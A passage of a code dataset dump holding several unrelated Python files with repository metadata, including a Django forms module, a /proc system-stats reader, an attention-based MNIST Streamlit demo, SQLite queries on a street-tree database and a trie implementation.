apply_softmax_on_simfeature = True):\n '''\n Return bilateral cost volume(Set of bilateral correlation map)\n :param sim_feature: Correlation feature based on operating frame's HW (N,D2,H,W)\n :param f_map: Previous frame mask (N,1,H,W)\n :return Correlation Cost: (N,(2d+1)^2,H,W)\n '''\n # feature1 = self.L2normalize(feature1)\n # feature2 = self.L2normalize(feature2)\n\n B_size,C_size,H_size,W_size = f_map.size()\n\n if self.grid is None:\n # Initialize first uniform grid\n self.grid = self.UniformGrid(f_map)\n\n if H_size != self.grid.size(2) or W_size != self.grid.size(3):\n # Update uniform grid to fit on input tensor shape\n self.grid = self.UniformGrid(f_map)\n\n\n # Displacement volume (N,(2d+1)^2,2,H,W) d = (i,j) , i in [-md,md] & j in [-md,md]\n D_vol = self.d.view(self.range, 2, 1, 1).expand(-1, -1, H_size, W_size) # [(2d+1)^2, 2, H, W]\n\n if apply_softmax_on_simfeature:\n sim_feature = F.softmax(sim_feature, dim=1) # B,D^2,H,W\n f_map = self.warp(f_map.transpose(0, 1).expand(self.range,-1,-1,-1), D_vol).transpose(0, 1) # B,D^2,H,W\n\n f_map = torch.sum(torch.mul(sim_feature, f_map),dim=1, keepdim=True) # B,1,H,W\n\n return f_map # B,1,H,W\n","repo_name":"yuk6heo/IVOS-ATNet","sub_path":"networks/ltm_transfer.py","file_name":"ltm_transfer.py","file_ext":"py","file_size_in_byte":3767,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"31"} +{"seq_id":"3374492697","text":"class Solution:\n def grayCode(self, n):\n maxval = 2 ** n - 1\n self.res = []\n def dfs(n, cur, maxval):\n if len(cur) == maxval + 1:\n self.res= cur[:]\n return\n if self.res != []:\n return\n cand = [1 << i ^ cur[-1] for i in range(n)]\n cand = [i for i in cand if i not in cur]\n for i in cand:\n cur.append(i)\n dfs(n, cur, maxval)\n cur.pop()\n\n path = [0]\n\n dfs(n, path, maxval)\n return self.res\n\n\nsol = Solution()\nprint(sol.grayCode(5))\n","repo_name":"hxl163630/practice","sub_path":"89. Gray Code.py","file_name":"89. 
Gray Code.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40753936537","text":"from builtins import str\nfrom builtins import object\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom .helpers import is_user_paid\nfrom events.models import *\nfrom training.models import *\nfrom .validators import validate_csv_file\n\nclass CreateTrainingEventForm(forms.ModelForm):\n courses = FossCategory.objects.filter(id__in=CourseMap.objects.filter(category=0, test=1).values('foss_id'))\n\n\n foss = forms.ModelChoiceField(empty_label='---------', queryset=courses)\n\n event_coordinator_email = forms.CharField(required = False)\n event_coordinator_contact_no = forms.CharField(required = False)\n class Meta(object):\n model = TrainingEvents\n exclude = ['entry_user', 'training_status', 'Language_of_workshop']\n \n\nclass RegisterUser(forms.ModelForm):\n \n state = forms.ModelChoiceField(\n widget = forms.Select(attrs = {'class' : 'ac-state'}),\n queryset = State.objects.order_by('name'),\n empty_label = \"--- Select State ---\", \n help_text = \"\",\n required=True,\n )\n college = forms.CharField(\n required = False,\n error_messages = {'required': 'component type is required.'},\n )\n foss_language = forms.ModelChoiceField(\n queryset = Language.objects.order_by('name'),\n required = False,\n help_text = \"You can listen to the FOSS in the above Indian languages\"\n )\n phone = forms.RegexField(regex=r'^\\+?1?\\d{8,15}$', error_messages = {'required': 'Enter valid phone number.'},)\n class Meta(object):\n model = Participant\n fields = ['name', 'email', 'state', 'gender', 'amount', 'foss_language']\n\n def __init__(self, *args, **kwargs):\n super(RegisterUser, self).__init__(*args, **kwargs)\n self.fields['amount'].required = False\n\nclass UploadParticipantsForm(forms.ModelForm):\n csv_file = forms.FileField(required=True)\n\n class Meta(object):\n model = Participant\n fields = ['registartion_type']\n \n def clean_csv_file(self):\n data = self.cleaned_data[\"csv_file\"]\n file_data = validate_csv_file(data)\n return file_data\n\nclass UploadCollegeForm(forms.ModelForm):\n csv_file = forms.FileField(required=True)\n\n class Meta(object):\n model = AcademicPaymentStatus\n exclude = ['entry_user']\n \n def clean_csv_file(self):\n data = self.cleaned_data[\"csv_file\"]\n file_data = validate_csv_file(data)\n return file_data\n\nclass TrainingManagerPaymentForm(forms.Form):\n state = forms.ChoiceField(choices=[('', '-- None --'), ], widget=forms.Select(attrs = {}), required = False)\n college = forms.ChoiceField(choices=[('0', '-- None --'), ], widget=forms.Select(attrs = {}), required = False)\n status = forms.ChoiceField(choices=[('', '-- None --'), ('S', 'Successfull'), ('F', 'Failed'),('X','Undefined')], required = False)\n request_type = forms.ChoiceField(choices=[('', '-- None --'), ('I', 'Initiated at Bank'), ('R', 'Reconciled')], required = False)\n fdate = forms.DateTimeField(required = False)\n tdate = forms.DateTimeField(required = False)\n events = forms.ChoiceField(choices=[('', '-- None --'), ], widget=forms.Select(attrs = {}), required = False)\n user_email = forms.EmailField(max_length = 200, required = False)\n userid = forms.IntegerField(required = False)\n def __init__(self, user,*args, **kwargs):\n initial = ''\n if 'instance' in kwargs:\n initial = kwargs[\"instance\"]\n del kwargs[\"instance\"]\n\n if 'user' in kwargs:\n user = kwargs[\"user\"]\n del 
kwargs[\"user\"]\n\n super(TrainingManagerPaymentForm, self).__init__(*args, **kwargs)\n \n\n rp_states = ResourcePerson.objects.filter(status=1,user=user)\n # load the choices\n state_list = list(State.objects.filter(id__in=rp_states.values('state')).order_by('name').values_list('id', 'name'))\n state_list.insert(0, ('', '-- None --'))\n self.fields['state'].choices = state_list\n\n centre_choices =[]\n centre_choices.insert(0,(0,'All Colleges'))\n\n event_choices = []\n event_choices.insert(0,(0,'All Events'))\n \n if args:\n if 'state' in args[0]:\n if args[0]['state'] and args[0]['state'] != '' and args[0]['state'] != 'None':\n centre_qs = AcademicCenter.objects.filter(state_id=args[0]['state']).order_by('institution_name')\n centre_choices = [(x.id, '%s, %s' % (x.institution_name, x.academic_code)) for x in centre_qs]\n centre_choices.insert(0,(0,'All Colleges'))\n self.fields['college'].choices = centre_choices\n self.fields['college'].widget.attrs = {}\n\n if 'college' in args[0]:\n if args[0]['college'] and args[0]['college'] != '' and args[0]['college'] != 'None':\n event_qs = TrainingEvents.objects.filter(host_college_id=args[0]['college']).order_by('event_name')\n event_choices = [(x.id, '%s, %s' % (x.event_name, x.event_type)) for x in event_qs]\n event_choices.insert(0,(0,'All Events'))\n self.fields['events'].choices = event_choices\n self.fields['events'].widget.attrs = {}\n\n\n\n\n","repo_name":"Spoken-tutorial/spoken-website","sub_path":"training/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"42088641738","text":"import resource\nimport time\nimport platform\n\n\ndef get_rlimit_nofile():\n soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)\n return {\"soft\": soft, \"hard\": hard}\n\n\ndef get_platform_info():\n try:\n uname = platform.uname()\n platform_info = {\n \"system\": uname.system,\n \"version\": uname.version,\n \"release\": uname.release,\n \"machine\": uname.machine,\n \"processor\": uname.processor\n }\n except:\n platform_info = {}\n try:\n with open('/proc/cpuinfo') as f:\n cpu_count = 0\n model = None\n for line in f:\n # Ignore the blank line separating the information between\n # details about two processing units\n if line.strip():\n if line.rstrip('\\n').startswith('model name'):\n model_name = line.rstrip('\\n').split(':')[1]\n model = model_name\n model = model.strip()\n cpu_count += 1\n platform_info['model'] = model\n platform_info['cores'] = cpu_count\n except Exception as e:\n print(e)\n return platform_info\n\n\ndef get_cpu_load():\n with open('/proc/loadavg') as f:\n cpu_load = f.read()\n cpu_load_result = cpu_load.split(\" \")\n return {\n \"1min\": cpu_load_result[0],\n \"5min\": cpu_load_result[1],\n \"15min\": cpu_load_result[2],\n }\n\n\ndef get_mem_info(unit=\"GB\"):\n \"\"\"\n Read in the /proc/meminfo and return a dictionary of the memory and swap\n usage for all processes.\n \"\"\"\n\n if unit == \"MB\":\n convert_unit = 1000\n elif unit == \"GB\":\n convert_unit = 1000 * 1000\n else:\n convert_unit = 1\n unit = \"KB\"\n\n data = {'mem_total': 0, 'mem_used': 0, 'mem_free': 0,\n 'swap_total': 0, 'swap_used': 0, 'swap_free': 0,\n 'buffers': 0, 'cached': 0}\n\n with open('/proc/meminfo', 'r') as fh:\n lines = fh.read()\n fh.close()\n\n for line in lines.split('\\n'):\n fields = line.split(None, 2)\n if fields[0] == 'MemTotal:':\n data['mem_total'] = int(fields[1], 10)\n elif fields[0] == 
'MemFree:':\n data['mem_free'] = int(fields[1], 10)\n elif fields[0] == 'Buffers:':\n data['buffers'] = int(fields[1], 10)\n elif fields[0] == 'Cached:':\n data['cached'] = int(fields[1], 10)\n elif fields[0] == 'SwapTotal:':\n data['swap_total'] = int(fields[1], 10)\n elif fields[0] == 'SwapFree:':\n data['swap_free'] = int(fields[1], 10)\n break\n data['mem_used'] = data['mem_total'] - data['mem_free']\n data['swap_used'] = data['swap_total'] - data['swap_free']\n\n for k, v in data.items():\n if isinstance(v, int):\n data[k] = round(v / convert_unit, 2)\n data['unit'] = unit\n\n return data\n\n\ndef get_cpu_time():\n cpu_infos = {}\n with open('/proc/stat', 'r') as file_stat:\n cpu_lines = []\n for lines in file_stat.readlines():\n for line in lines.split('\\n'):\n if line.startswith('cpu'):\n cpu_lines.append(line.split(' '))\n for cpu_line in cpu_lines:\n if '' in cpu_line:\n cpu_line.remove('') # First row(cpu) exist '' and Remove ''\n cpu_id = cpu_line[0]\n cpu_line = [float(item) for item in cpu_line[1:]]\n user, nice, system, idle, iowait, irq, softirq, steal, guest, guest_nice = cpu_line\n\n idle_time = idle + iowait\n non_idle_time = user + nice + system + irq + softirq + steal\n total = idle_time + non_idle_time\n\n cpu_infos.update({cpu_id: {'total': total, 'idle': idle_time}})\n return cpu_infos\n\n\ndef get_cpu_usage_percentage():\n start = get_cpu_time()\n time.sleep(1)\n end = get_cpu_time()\n\n cpu_usages = {}\n for cpu in start:\n diff_total = end[cpu]['total'] - start[cpu]['total']\n diff_idle = end[cpu]['idle'] - start[cpu]['idle']\n # diff_iowait = end[cpu]['iowait'] - start[cpu]['iowait']\n cpu_usage_percentage = (diff_total - diff_idle) / diff_total * 100\n cpu_usages.update({cpu: round(cpu_usage_percentage, 2)})\n return cpu_usages\n","repo_name":"icon-project/icon2-docker","sub_path":"ctx/common/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"32894762597","text":"#!/user/bin/env python\n\"\"\"Google Code Jam 2008: Problem C. 
Egg Drop\"\"\"\n\nfrom builtins import input\n\ntable = {}\n\ndef main():\n N = int(input())\n if N < 1 or N > 100:\n raise RuntimeError(\"N is not within the valid range\")\n for i in range(N):\n F,D,B = map(int, input().split())\n r = EggDrop(F,D,B)\n print(\"Case #\" + str(i + 1) + \": \" + r)\n\ndef EggDrop(F,D,B):\n f = maxF(D,B)\n if f >= 2**32:\n f = -1\n return ( str(f) + \" \" + str(minD(F,B)) + \" \" + str(minB(F,D)))\n\ndef maxF(D, B):\n if table.get((D,B), 0) != 0:\n return table[(D,B)]\n if B >= D:\n table[(D,B)] = (2**D)-1\n return (2**D)-1\n if B == 1:\n table[(D,B)] = D\n return D\n table[(D,B)] = maxF(D-1,B) + maxF(D-1, B-1) + 1\n return table[D,B]\n\ndef minD(F, B):\n if B == 1:\n return F\n d = 1\n while maxF(d,B) < F:\n d += 1\n return d \n\ndef minB(F, D):\n b = 1\n while maxF(D,b) < F:\n b += 1\n return b\n\n\nif __name__==\"__main__\":\n main()\n","repo_name":"xx3nvyxx/challenges","sub_path":"codejam/2008/Practice Problems/C/EggDrop.py","file_name":"EggDrop.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37987680416","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np\nfrom torchvision import datasets\nimport torchvision.transforms as tvtransforms\n\nimport streamlit as st\n\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n\nclass HardMNIST(datasets.MNIST):\n def __init__(self, root, img_output_shape, noise_level_max, noise_char_max, pos_x, pos_y, digit_out_size, bg_digits,\n train=True, transform=None, target_transform=None, download=False):\n super(HardMNIST, self).__init__(root, train=train, transform=transform, target_transform=target_transform,\n download=download)\n # transformation parameters\n self.img_output_shape = img_output_shape # new output size (still quadratic)\n self.noise_level_max = noise_level_max # max. percentage of additive Gaussian noise\n self.noise_char_max = noise_char_max # max. perentage of salt'n'pepper digit noise\n self.max_rotation = 45 # includes pos and negative directions\n self.max_non_trgts = 10 # maximum number of non-target digits in the background\n self.posx = pos_x\n self.posy = pos_y\n self.digit_out_size = digit_out_size\n self.bg_digits = bg_digits\n # store PIL images of mnist digits\n self.pil_imgs = list()\n for i in range(len(self.data)):\n self.pil_imgs.append(tvtransforms.ToPILImage()(self.data[i]).convert())\n\n def transform_mnist(self, idx, new_size=28, noise=0.5,\n sp_noise=0.1, rotate=0, intensity=1.0):\n # digit_img = transforms.ToPILImage()(img).convert()\n digit_img = self.pil_imgs[idx]\n digit_img = digit_img.rotate(rotate, expand=True)\n digit_img = digit_img.resize((new_size, new_size))\n digit_img = torch.Tensor(digit_img.getdata()).float().view(new_size, new_size)\n\n digit_img *= intensity\n digit_img += 255. * noise * torch.rand(new_size, new_size)\n digit_img[digit_img > 255.] = 255.\n\n num_pixels = np.int(new_size * new_size * sp_noise)\n pixels = np.random.permutation(new_size * new_size)[:num_pixels]\n\n pixels2d = np.unravel_index(pixels, (new_size, new_size))\n if sp_noise > 1e-3:\n rnd_img = 255. 
* noise * torch.rand(new_size, new_size)\n digit_img[pixels2d] = rnd_img[pixels2d]\n return digit_img\n\n def __getitem__(self, index):\n target = int(self.targets[index])\n non_trgt_inds = np.where(self.targets != target)[0]\n\n # select some non-target background digits\n non_trgts = self.bg_digits\n non_trgt_inds = np.random.permutation(non_trgt_inds)[:non_trgts]\n\n # background noise level\n noise_level = self.noise_level_max * np.random.rand()\n new_img = 255. * noise_level * torch.rand(self.img_output_shape, self.img_output_shape)\n\n for ind in non_trgt_inds:\n # noise_char_level = np.max([0.25, np.random.rand()])\n noise_char_level = 0.\n rotation = 2 * self.max_rotation * np.random.rand() - self.max_rotation + 180\n # scale this mnist digit img to this size\n digit_size = np.max([20, np.int(self.img_output_shape / 4 * np.random.rand())])\n digit_img = self.transform_mnist(ind,\n new_size=digit_size,\n noise=noise_level,\n sp_noise=noise_char_level,\n rotate=rotation,\n intensity=0.65)\n pos_x = np.int((self.img_output_shape - digit_size) * np.random.rand())\n pos_y = np.int((self.img_output_shape - digit_size) * np.random.rand())\n new_img[pos_y:pos_y + digit_size, pos_x:pos_x + digit_size] = digit_img\n # new_img[pos_y:pos_y + digit_size, pos_x:pos_x + digit_size] /= 2.\n\n noise_char_level = self.noise_char_max * np.random.rand()\n digit_size = self.digit_out_size\n digit_img = self.transform_mnist(index,\n new_size=digit_size,\n noise=noise_level,\n sp_noise=noise_char_level, rotate=0)\n\n pos_x = np.min([self.posx, self.img_output_shape - digit_size])\n pos_y = np.min([self.posy, self.img_output_shape - digit_size])\n new_img[pos_y:pos_y + digit_size, pos_x:pos_x + digit_size] = digit_img\n\n new_img /= 256.\n final_img = Image.fromarray(new_img.numpy(), mode='F').resize((self.img_output_shape, self.img_output_shape))\n\n if self.transform is not None:\n final_img = self.transform(final_img)\n return final_img, target\n\n\nclass SoftAttnClassifier(nn.Module):\n\n def __init__(self, img_output_shape, att_scale=10.):\n super(SoftAttnClassifier, self).__init__()\n self.att_scale = att_scale\n self.img_size = img_output_shape\n self.mask_size = np.int(self.img_size / 2.)\n # Feature extractor\n self.fe = nn.Sequential(\n nn.Conv2d(1, 16, 5, 1, 2),\n nn.BatchNorm2d(16),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2, 2),\n nn.Conv2d(16, 32, 5, 1, 2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2, 2),\n )\n # Upsample layer\n self.upsample = nn.Sequential(\n # upsample part\n nn.Upsample(size=(self.mask_size, self.mask_size), mode='nearest'),\n nn.Conv2d(32, 4, 1, 1),\n nn.BatchNorm2d(4),\n )\n # Classifier\n self.classifier = nn.Sequential(\n nn.Linear(4 * self.mask_size * self.mask_size, 500, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(500, 10, bias=False),\n nn.LogSoftmax(dim=1),\n )\n # Attention sub-net\n self.fc_attn_size = np.int(self.img_size / 2. 
/ 2.)\n self.foo_1 = torch.arange(0, self.mask_size, device='cpu', dtype=torch.get_default_dtype())[None,\n :] / np.float(\n self.mask_size)\n self.attn_conv = nn.Conv2d(32, 1, 1, 1)\n self.attn = nn.Sequential(\n nn.Linear(self.fc_attn_size * self.fc_attn_size, 500, bias=True),\n nn.Sigmoid(),\n nn.Linear(500, 4, bias=True),\n nn.Sigmoid(),\n )\n\n def forward(self, x):\n xs = self.fe(x)\n self.mask, self.theta = self.attention(xs)\n xs = self.upsample(xs)\n # (Hadarmad product: feature map * attention mask\n # xy' * mask = diag_x mask diag_y)\n y = xs * self.mask\n self.glimpse = y\n z = y.view(-1, self.mask_size * self.mask_size * 4)\n return self.classifier(z), self.theta[:, 2:]\n\n def attention(self, x):\n num_samples = x.size()[0]\n foo = self.foo_1.repeat(num_samples, 1)\n z = self.attn_conv(x)\n z = self.attn(z.view(-1, self.fc_attn_size * self.fc_attn_size))\n\n loc_x = z[:, 0].view(-1, 1).repeat(1, self.mask_size)\n loc_y = z[:, 1].view(-1, 1).repeat(1, self.mask_size)\n\n sigma_x = z[:, 2].view(-1, 1).repeat(1, self.mask_size)\n sigma_y = z[:, 3].view(-1, 1).repeat(1, self.mask_size)\n\n x_vec = torch.exp(-(foo - loc_x) * (foo - loc_x) / sigma_x)\n y_vec = torch.exp(-(foo - loc_y) * (foo - loc_y) / sigma_y)\n\n a_x = x_vec.div(x_vec.sum(dim=1).view(-1, 1).repeat(1, self.mask_size) / self.att_scale)\n a_y = y_vec.div(y_vec.sum(dim=1).view(-1, 1).repeat(1, self.mask_size) / self.att_scale)\n xa = torch.matmul(a_x.view(-1, self.mask_size, 1),\n a_y.view(-1, 1, self.mask_size)).view(\n -1, 1, self.mask_size, self.mask_size)\n return xa, z\n\n\ndef get_activation(activation, name):\n def hook(model, input, output):\n activation[name] = output.detach()\n return hook\n\n\ndef load_model(img_output_shape):\n model = SoftAttnClassifier(img_output_shape).to('cpu')\n model.load_state_dict(torch.load(\"soft-attn/weights.pt\", map_location=torch.device('cpu')))\n model.eval()\n return model\n\n\nimg_output_shape = 100\nimg_noise_level = 1\n\nparam_choice = st.selectbox('Choose the class label', [*np.arange(10).tolist()])\n\nparam_size = st.slider('Digit size', 20, img_output_shape-1, 25, step=1)\nmax_pos = img_output_shape - param_size\nparam_posx = st.slider('Horizontal position', 0, max_pos, min([30, max_pos]), step=1)\nparam_posy = st.slider('Vertical position', 0, max_pos, min([40, max_pos]), step=1)\nparam_bg_digits = st.slider('Number of background noise digits', 0, 10, 10, step=1)\n\n# param_noise_level = st.slider('Background noise level', 0., 1., 0.5, step=0.01)\n# param_noise_char = st.slider('Digit noise level', 0., 1., 0., step=0.01)\n\nparam_noise_level = 0.95\nparam_noise_char = 0.\n\nmodel = load_model(img_output_shape)\n\ntransforms = tvtransforms.Compose([tvtransforms.ToTensor(), tvtransforms.Normalize((0.13,), (0.3,))])\ndata = HardMNIST('soft-attn/data', img_output_shape, param_noise_level, param_noise_char,\n pos_x=param_posx, pos_y=param_posy, digit_out_size=param_size, bg_digits=param_bg_digits,\n train=True, download=True, transform=transforms)\n\n# Visualize feature maps\nfig = plt.figure(figsize=(9, 2), dpi=200, facecolor='w', edgecolor='k')\ntrgts = data.targets\ninds = np.where(np.array(trgts) == param_choice)[0]\nsamples = 1\ncnt = 1\nfor i in range(samples):\n img, target = data.__getitem__(inds[i])\n\n input = img.view(1, 1, 100, 100)\n\n outputs, _ = model(input) # TODO\n _, preds = torch.max(outputs, 1)\n\n st.write('True class is {0} and predicted class is {1}.'.format(param_choice, preds[0]))\n\n # act = activation['a'].detach().cpu().squeeze()\n gauss = 
model.theta.detach().cpu().squeeze()\n\n mask_raw = model.mask[i, 0, :, :].detach().view(model.mask_size, model.mask_size).cpu().numpy()\n mask = np.array(Image.fromarray(mask_raw).resize((model.img_size, model.img_size)))\n glimpse_comb = model.glimpse[i, :, :, :].sum(dim=0)\n glimpse_raw = glimpse_comb.detach().view(model.mask_size, model.mask_size).cpu().numpy()\n glimpse = np.array(Image.fromarray(glimpse_raw).resize((model.img_size, model.img_size)))\n\n pos_x = gauss[1] * img_output_shape\n pos_y = gauss[0] * img_output_shape\n sigm_x = 3. * gauss[3] * img_output_shape\n sigm_y = 3. * gauss[2] * img_output_shape\n\n img = img.view(100, 100).numpy()\n\n plt.subplot(samples, 4, cnt)\n plt.imshow(img)\n plt.xlim([0, img_output_shape])\n plt.ylim([img_output_shape, 0])\n plt.xticks([])\n plt.yticks([])\n if i == 0:\n plt.title('Input image')\n\n plt.subplot(samples, 4, cnt+1)\n plt.imshow(mask, cmap='inferno')\n\n plt.xticks([])\n plt.yticks([])\n plt.xlim([0, img_output_shape])\n plt.ylim([img_output_shape, 0])\n if i == 0:\n plt.title('Attention mask')\n\n plt.subplot(samples, 4, cnt+2)\n plt.imshow(mask, cmap='Reds')\n plt.imshow(img, cmap='gray', alpha=0.35)\n plt.xticks([])\n plt.yticks([])\n\n plt.imshow(glimpse, cmap='inferno')\n plt.imshow(img, cmap='gray', alpha=0.25)\n\n plt.xticks([])\n plt.yticks([])\n if i == 0:\n plt.title('Attention glimpse')\n\n plt.subplot(samples, 4, cnt+3)\n plt.imshow(img, cmap='Greys_r')\n plt.plot(pos_x, pos_y, 'or', linewidth=4)\n plt.hlines(pos_y - sigm_y, pos_x - sigm_x, pos_x + sigm_x, 'r', linewidth=2)\n plt.hlines(pos_y + sigm_y, pos_x - sigm_x, pos_x + sigm_x, 'r', linewidth=2)\n plt.vlines(pos_x - sigm_x, pos_y - sigm_y, pos_y + sigm_y, 'r', linewidth=2)\n plt.vlines(pos_x + sigm_x, pos_y - sigm_y, pos_y + sigm_y, 'r', linewidth=2)\n plt.xlim([0, img_output_shape])\n plt.ylim([img_output_shape, 0])\n plt.xticks([])\n plt.yticks([])\n if i == 0:\n plt.title('Inferred bounding box')\n\n cnt += 4\n\nst.pyplot(fig)\n","repo_name":"nicococo/streamlit-krabbelbox","sub_path":"soft-attn/soft_attn_demo.py","file_name":"soft_attn_demo.py","file_ext":"py","file_size_in_byte":11966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"313315648","text":"#Make a phone book\n\npb = {\n \"Ian\" : { \"Home\" : \"111-222-3333\", \"Work\" : \"444-555-6666\" },\n \"Julie\" : { \"Home\" : \"777-888-9999\", \"Work\" : \"111-222-1234\"}\n }\n\n# what to think about when data modeling: consistency, access, validity across rows\n# name of person must be unique, fast access, declaring a head of time\n\n\nimport sqlite3\nfrom pprint import pprint\n\n\n# Return one row with the column names attached\n \nwith sqlite3.connect('sf-trees.db', timeout = 1) as conn:\n conn.row_factory = sqlite3.Row # return keys and values in rows\n cursor = conn.execute('''\n SELECT * FROM Street_Tree_List\n LIMIT 1; \n ''') # <-- context manager, prevents database access outside with clause\n\n\n for row in cursor:\n pprint(dict(row))\n\n\nwith sqlite3.connect('sf-trees.db', timeout=1) as conn:\n cursor = conn.execute(\"SELECT value FROM qCaretaker;\")\n \n for row in cursor:\n print(row)\n\n\nwith sqlite3.connect('sf-trees.db', timeout=1) as conn:\n cursor = conn.execute('''\n SELECT count(Street_Tree_List.qAddress)\n FROM Street_Tree_List, qCaretaker\n WHERE Street_Tree_List.qCaretaker == qCaretaker.id\n AND qCaretaker.value == \"Police Dept\"\n ;\n '''\n )\n \n for row in cursor:\n print(row)\n\n\nwith 
sqlite3.connect('sf-trees.db', timeout=1) as conn:\n cursor = conn.execute('''\n SELECT Street_Tree_List.qAddress\n FROM Street_Tree_List, qCaretaker, qLegalStatus\n WHERE Street_Tree_List.qCaretaker == qCaretaker.id\n AND Street_Tree_List.qLegalStatus = qLegalStatus.id\n AND qCaretaker.value == \"Police Dept\"\n AND qLegalStatus.value LIKE \"Sig%\"\n ;\n '''\n )\n \n for row in cursor:\n print(row)\n\n\n# https://github.com/jgarst/PythonClass/blob/master/course/sqlite3/sqlite.ipynb\n\n\n\nprint(\"creating table...\")\n\n\nwith sqlite3.connect('sf-trees.db', timeout=1) as conn:\n cursor = conn.execute('''\n CREATE TABLE t1(\n x INTEGER PRIMARY KEY,\n y INTEGER,\n month TEXT,\n day TEXT,\n FFMC INTEGER,\n DMC INTEGER,\n DC INTEGER,\n ISI INTEGER,\n temp INTEGER,\n RH INTEGER,\n wind INTEGER,\n rain INTEGER,\n area BLOB\n )\n '''\n);\n\nprint(\"inserting row...\")\n\nwith sqlite3.connect('sf-trees.db', timeout=1) as conn:\n\n cursor = conn.execute('''\n INSERT into t1 VALUES(7, 5,\t\"mar\",\t\"fri\", 86.2, 26.2, 94.3, 5.1, 8.2, 51,\t6.7, 0, 0);\n '''\n)\n\n\n\n\n\n# look at dataset page, sqlite then .data or .schema, or load first row of data in sql database \n","repo_name":"icolrick/rproject","sub_path":"python/sqllite3.py","file_name":"sqllite3.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12882424126","text":"from averageTime import parseFileFinal\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\n\n\ndef drawSample7InfluGraph():\n x1 = []\n y1 = []\n x2 = []\n y2 = []\n for i in range(1, 11):\n file_name1 = \"./data/hypertext-class/sample7/records/influ\"+str(i)+\".log\"\n file_name2 = \"./data/hypertext-class/sample7/records/influEquation\"+str(i)+\".log\"\n file1 = open(file_name1, 'r')\n file2 = open(file_name2, 'r')\n dic1 = parseFileFinal(file1)\n x1 += dic1['unobserved']\n y1 += dic1['influ']\n dic2 = parseFileFinal(file2)\n x2 += dic2['unobserved']\n y2 += dic2['influ']\n\n fig, ax = plt.subplots()\n ax.scatter(x1, y1, marker='o', c='blue', label=\"approx\", alpha=0.5, edgecolors='none')\n ax.scatter(x2, y2, marker='^', c='red', label=\"exact\", alpha=0.5, edgecolors='none')\n ax.legend()\n ax.set_xlabel(\"number of unobserved tuples\")\n ax.set_ylabel(\"influence inference time\")\n ax.set_yscale('log')\n ax.set_ylim(1e-5, 1e-1)\n plt.show()\n\n\ndef drawSample7ProbGraph():\n x1 = []\n y1 = []\n x2 = []\n y2 = []\n for i in range(1, 11):\n file_name1 = \"./data/hypertext-class/sample7/records/Gibbssample\"+str(i)+\".log\"\n file_name2 = \"./data/hypertext-class/sample7/records/sample\"+str(i)+\".log\"\n file1 = open(file_name1, 'r')\n file2 = open(file_name2, 'r')\n dic1 = parseFileFinal(file1)\n x1 += dic1['unobserved']\n y1 += dic1['gibbs']\n dic2 = parseFileFinal(file2)\n x2 += dic2['unobserved']\n y2 += dic2['pgibbs']\n\n fig, ax = plt.subplots()\n ax.scatter(x2, y2, marker='o', c='blue', label=\"iterative\", alpha=0.5, edgecolors='none')\n ax.scatter(x1, y1, marker='^', c='red', label=\"sampling\", alpha=0.5, edgecolors='none')\n ax.set_xlabel(\"number of unobserved tuples\")\n ax.set_ylabel(\"probability inference time\")\n ax.set_yscale(\"log\")\n ax.set_ylim(1e-5, 10)\n ax.legend()\n plt.show()\n\n\n\nif __name__==\"__main__\":\n\n drawSample7InfluGraph()\n # 
drawSample7ProbGraph()","repo_name":"milliondegree/MLNInfer","sub_path":"drawScatterGraph.py","file_name":"drawScatterGraph.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1064552123","text":"# DESCRIPTION\n# Implement a trie with insert, search, and startsWith methods.\n\n# EXAMPLE:\n# Trie trie = new Trie();\n\n# trie.insert(\"apple\");\n# trie.search(\"apple\"); // returns true\n# trie.search(\"app\"); // returns false\n# trie.startsWith(\"app\"); // returns true\n# trie.insert(\"app\");\n# trie.search(\"app\"); // returns true\n\n# Note:\n# You may assume that all inputs consist of lowercase letters a-z.\n# All inputs are guaranteed to be non-empty strings.\n\nclass TrieNode:\n def __init__(self):\n self.children = [None for i in range(26)]\n self.complete = False\n\n\nclass Trie:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.root = TrieNode()\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie.\n Time: O(N), where N is the len of the word\n Space: O(N), where N is the len of the word\n \"\"\"\n node = self.root\n\n for i in word:\n\n if node.children[ord(i)-ord('a')] == None:\n node.children[ord(i)-ord('a')] = TrieNode()\n\n node = node.children[ord(i)-ord('a')]\n\n node.complete = True\n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the trie.\n Time: O(N), N is the len of word\n Space: O(1), no extra space\n \"\"\"\n node = self.root\n\n for i in word:\n\n if node.children[ord(i)-ord('a')] == None:\n return False\n node = node.children[ord(i)-ord('a')]\n\n return node.complete\n\n def startsWith(self, prefix: str) -> bool:\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n Time: O(N), N is the len of prefix\n Space: O(1)\n \"\"\"\n node = self.root\n\n for i in prefix:\n\n if node.children[ord(i)-ord('a')] == 